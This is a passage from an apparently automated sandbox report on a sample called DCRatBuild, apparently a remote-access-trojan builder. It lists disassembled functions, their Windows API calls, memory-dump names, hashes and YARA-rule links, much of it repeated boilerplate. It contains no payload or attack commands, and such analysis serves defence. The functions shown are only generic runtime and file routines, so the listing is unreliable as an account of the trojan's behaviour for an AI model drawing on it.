                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 4727c7b6a86ce55a5cc090027630b5fdc7eba910fae43cf2d5e1dbead56ccc73
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: 4727c7b6a86ce55a5cc090027630b5fdc7eba910fae43cf2d5e1dbead56ccc73
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        Function 004AE555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 9639a641e994a735b7d12303ce0e8380cfb976a6d47a69e28bdcd2d6ebfae3f9
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: 9639a641e994a735b7d12303ce0e8380cfb976a6d47a69e28bdcd2d6ebfae3f9
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        Function 004AE569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: c12bc3641687dbc650cc512fd1469dd70c8e0cc9187567eb532a87105bc3a532
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: c12bc3641687dbc650cc512fd1469dd70c8e0cc9187567eb532a87105bc3a532
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        Function 004AE573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 76ac8d4302d32431c7f42059ef7ea1093152d949d87785229fd5c7d0d7f4c8fa
                                                                                                                        • Instruction ID: 0a7d6e424a8176da76fd721f698b49ab2baa141fa15af3fdeb47cbd3d67c5869
                                                                                                                        • Opcode Fuzzy Hash: 76ac8d4302d32431c7f42059ef7ea1093152d949d87785229fd5c7d0d7f4c8fa
                                                                                                                        • Instruction Fuzzy Hash: 49A011CAAA80003C300822A32E02E3B020CC0E2B2A3308A2FF82882080A88C0802083E
                                                                                                                        Function 004AE58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: bc82e31cc4b92abf23cfac6b219e491d856b4d08c78b3853b5295703762cdf6b
                                                                                                                        • Instruction ID: ca29e70e9e5d5feca07db713aa72ab34abf2e628277f0c2838a01e3bbf3d993c
                                                                                                                        • Opcode Fuzzy Hash: bc82e31cc4b92abf23cfac6b219e491d856b4d08c78b3853b5295703762cdf6b
                                                                                                                        • Instruction Fuzzy Hash: AFA012C5A580017C300821932D02D37010CC0D6B18330481FF42581080684C0801043D
                                                                                                                        Function 004AE5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: e9cc630b598c6983175e4d51adb2a307e9215d00c0e0308da59c1c27f3811ba3
                                                                                                                        • Instruction ID: ca29e70e9e5d5feca07db713aa72ab34abf2e628277f0c2838a01e3bbf3d993c
                                                                                                                        • Opcode Fuzzy Hash: e9cc630b598c6983175e4d51adb2a307e9215d00c0e0308da59c1c27f3811ba3
                                                                                                                        • Instruction Fuzzy Hash: AFA012C5A580017C300821932D02D37010CC0D6B18330481FF42581080684C0801043D
                                                                                                                        Function 004BBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004BB7BB: GetOEMCP.KERNEL32(00000000,?,?,004BBA44,?), ref: 004BB7E6
                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004BBA89,?,00000000), ref: 004BBC64
                                                                                                                        • GetCPInfo.KERNEL32(00000000,004BBA89,?,?,?,004BBA89,?,00000000), ref: 004BBC77
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 546120528-0
                                                                                                                        • Opcode ID: edbf3e8aa2d1601943e15be55bcd30d961927fa9021c473b3746a68018d4cf8f
                                                                                                                        • Instruction ID: 84458f733b1a7a8decb94940df619aa284f061303da5e2955609a9a51f83195c
                                                                                                                        • Opcode Fuzzy Hash: edbf3e8aa2d1601943e15be55bcd30d961927fa9021c473b3746a68018d4cf8f
                                                                                                                        • Instruction Fuzzy Hash: 795114709002459EDB20DF76C881AFBBBF8EF42304F18446FD4968B251D7BD99469BE8
                                                                                                                        Function 00499A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00499A50,?,?,00000000,?,?,00498CBC,?), ref: 00499BAB
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00498411,-00009570,00000000,000007F3), ref: 00499BB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: 7cc2b69264fb7b91684226f39ebca6c3819d820812f44460be03f7cfa8618973
                                                                                                                        • Instruction ID: 486a029d3a41326ebaf1544a5da96dab4b349e082ab4856c6b3f36081389c0f3
                                                                                                                        • Opcode Fuzzy Hash: 7cc2b69264fb7b91684226f39ebca6c3819d820812f44460be03f7cfa8618973
                                                                                                                        • Instruction Fuzzy Hash: 29419A31A043419BDF24DF19E58486BBBE5FBD9320F148A3EE88183360D77CBD458A5A
                                                                                                                        Function 00491E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00491E55
                                                                                                                          • Part of subcall function 00493BBA: __EH_prolog.LIBCMT ref: 00493BBF
                                                                                                                        • _wcslen.LIBCMT ref: 00491EFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2838827086-0
                                                                                                                        • Opcode ID: 41a9674e0f1bfc31ecce38e051d96423423823174c74fbe6280fa7d00b6a9cd7
                                                                                                                        • Instruction ID: d928958e7886388b977b271aba1ee7e64e15e08d8831026df5ff66dca0140783
                                                                                                                        • Opcode Fuzzy Hash: 41a9674e0f1bfc31ecce38e051d96423423823174c74fbe6280fa7d00b6a9cd7
                                                                                                                        • Instruction Fuzzy Hash: 9E314B7190420A9FCF15DF9AC945AEEBBF5AF18304F1004AFF445A7261C73A9E11CB68
                                                                                                                        Function 00499DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004973BC,?,?,?,00000000), ref: 00499DBC
                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00499E70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1392018926-0
                                                                                                                        • Opcode ID: cf72a28479ca29cc3412154abc41fa0c7ffba962253001fc38a40ecee5c30b73
                                                                                                                        • Instruction ID: 37845e66cc4720e627ae9d4582e5b84bee34c4118548ed6c525d50db2835bdab
                                                                                                                        • Opcode Fuzzy Hash: cf72a28479ca29cc3412154abc41fa0c7ffba962253001fc38a40ecee5c30b73
                                                                                                                        • Instruction Fuzzy Hash: F921E131248245ABCF14CF29C891AABBFE4AF52304F08492EF4C583681D32DDD0C8B65
                                                                                                                        Function 0049966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00499F27,?,?,0049771A), ref: 004996E6
                                                                                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00499F27,?,?,0049771A), ref: 00499716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: bc0db83057e6a038bfd9c4c9cc178e7592dce9e743c41b5abcd0a71462cbf8ef
                                                                                                                        • Instruction ID: 92dca8a784ff100e91777deee29eacc0d12046d80aa0770378b9dab119a98468
                                                                                                                        • Opcode Fuzzy Hash: bc0db83057e6a038bfd9c4c9cc178e7592dce9e743c41b5abcd0a71462cbf8ef
                                                                                                                        • Instruction Fuzzy Hash: 5C21F1B1000344AFE7308A69CC89FB77BDCEB49324F004A2EFA95C22C1C778AC848635
                                                                                                                        Function 00499E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00499EC7
                                                                                                                        • GetLastError.KERNEL32 ref: 00499ED4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: d9eb9d1d0fe1e0c35c408bad47eb0c0886d0468c27ad92cead25de490927ccdd
                                                                                                                        • Instruction ID: 3fba760d92cf62297dd47f4b75cda034a9b6540c11afa1def11e1211afe78d38
                                                                                                                        • Opcode Fuzzy Hash: d9eb9d1d0fe1e0c35c408bad47eb0c0886d0468c27ad92cead25de490927ccdd
                                                                                                                        • Instruction Fuzzy Hash: 6011C231600600ABDF24DA2DC844BA7BBE9AB45360F504A3FE562D26E4D778AD45C668
                                                                                                                        Function 004B8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 004B8E75
                                                                                                                          • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,004D1098,004917CE,?,?,00000007,?,?,?,004913D6,?,00000000), ref: 004B8EB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2447670028-0
                                                                                                                        • Opcode ID: 9439749044c9c538e4f683509567954a4724ec3e00e195891b3c37900ee85941
                                                                                                                        • Instruction ID: 39e561c2b924760afb71fff78914d56b256f60fbde6e5a8bd7fef78f19e8c9cb
                                                                                                                        • Opcode Fuzzy Hash: 9439749044c9c538e4f683509567954a4724ec3e00e195891b3c37900ee85941
                                                                                                                        • Instruction Fuzzy Hash: 1DF0C2322011066ADB212A269C05BEF375C8FD1B70B24412FF814EA291DF7CDD01C1BD
                                                                                                                        Function 004A109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 004A10AB
                                                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 004A10B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1231390398-0
                                                                                                                        • Opcode ID: 024e760c9ecc6ec41ed25fefdeb70935757b9cb1e6b7981c4800ba6b974d0ca7
                                                                                                                        • Instruction ID: b4dcab7c7d1fcc3e9f3ba45760ab951a664d3f618c2b9c509af0e5b9e1cae697
